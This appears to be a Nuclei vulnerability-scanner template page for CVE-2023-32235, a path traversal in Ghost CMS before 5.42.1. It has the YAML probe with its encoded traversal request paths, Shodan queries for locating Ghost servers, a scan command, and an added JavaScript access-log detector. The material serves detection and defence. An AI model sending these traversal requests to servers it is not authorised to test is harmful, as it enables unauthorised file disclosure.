Ghost CMS < 5.42.1 - Path Traversal
ID: CVE-2023-32235
Severity: high
Author: j3ssie
Tags: cve2023,cve,lfi,ghostcms,ghost,node.js
Description
Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme’s folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.
YAML Source
id: CVE-2023-32235

info:
  name: Ghost CMS < 5.42.1 - Path Traversal
  author: j3ssie
  severity: high
  description: |
    Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.
  impact: |
    An attacker can exploit this vulnerability to access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
  remediation: Fixed in version 5.42.1
  reference:
    - https://github.com/advisories/GHSA-wf7x-fh6w-34r6
    - https://nvd.nist.gov/vuln/detail/CVE-2023-32235
    - https://github.com/TryGhost/Ghost/commit/378dd913aa8d0fd0da29b0ffced8884579598b0f
    - https://github.com/TryGhost/Ghost/compare/v5.42.0...v5.42.1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-32235
    cwe-id: CWE-22
    epss-score: 0.01376
    epss-percentile: 0.84873
    cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ghost
    product: ghost
    framework: node.js
    shodan-query:
      - http.component:"Ghost"
      - http.component:"ghost"
  tags: cve2023,cve,lfi,ghostcms,ghost,node.js

http:
  - method: GET
    path:
      - "{{BaseURL}}/assets/built%2F..%2F..%2F/package.json"
      - "{{BaseURL}}/assets/built%2F..%2F..%2F%E0%A4%A/package.json"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"name"'
          - '"version"'
          - '"ghost"'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220738cd239886e3e8aa6bd457dbcc1c5a012a09cfe43ec7c89395002c7a833b676022100ff965b8420a9e520dda525f98d8a73cefe8c137b732dd16acdd5339385eb37b4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-32235.yaml"
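
The encoded traversal described above can also be looked for in web server access logs. The JavaScript below is an added example, not part of the template or of Ghost's code: it decodes each /assets/ request path, resolves its `..` segments, and flags paths that leave /assets/ or cannot be decoded. The function names, the log format and the sample lines are assumptions constructed for illustration.

```javascript
// Added example; names are hypothetical and not taken from Ghost's code.
const ASSET_PREFIX = '/assets/';

// Decode percent-escapes repeatedly so double encoding (%252F) is caught.
// Returns null when decoding throws, e.g. on the truncated %E0%A4%A sequence.
function fullyDecode(raw, maxRounds = 3) {
  let current = raw;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch (e) { return null; }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Resolve "." and ".." segments; null means the path climbed above the root.
function resolveSegments(p) {
  const out = [];
  for (const seg of p.replace(/\\/g, '/').split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') { if (out.length === 0) return null; out.pop(); }
    else out.push(seg);
  }
  return out;
}

function classifyAssetRequest(rawPath) {
  const pathOnly = rawPath.split(/[?#]/)[0];
  if (!pathOnly.startsWith(ASSET_PREFIX)) return 'not-asset';
  const decoded = fullyDecode(pathOnly);
  if (decoded === null || decoded.includes('\0')) return 'malformed';
  const segs = resolveSegments(decoded);
  // After decoding and resolving, the path must still sit under /assets/.
  return segs !== null && segs[0] === 'assets' ? 'ok' : 'traversal';
}

// Constructed access-log lines (documentation IPs), not real traffic.
const SAMPLE_LOG = [
  '203.0.113.7 - - [10/May/2023:10:00:01 +0000] "GET /assets/built/screen.css?v=1 HTTP/1.1" 200 5120',
  '203.0.113.9 - - [10/May/2023:10:00:02 +0000] "GET /assets/built%2F..%2F..%2F/package.json HTTP/1.1" 404 0',
  '203.0.113.9 - - [10/May/2023:10:00:03 +0000] "GET /assets/built%2F..%2F..%2F%E0%A4%A/package.json HTTP/1.1" 404 0',
];

function scanLog(lines) {
  return lines
    .map((line) => /"(?:GET|HEAD) (\S+) HTTP\/[\d.]+"/.exec(line))
    .filter((m) => m !== null)
    .map((m) => ({ path: m[1], verdict: classifyAssetRequest(m[1]) }))
    .filter((hit) => hit.verdict === 'traversal' || hit.verdict === 'malformed');
}

console.log(scanLog(SAMPLE_LOG));
```

A hit only shows that such a request was made; whether a file was disclosed depends on the Ghost version that served it.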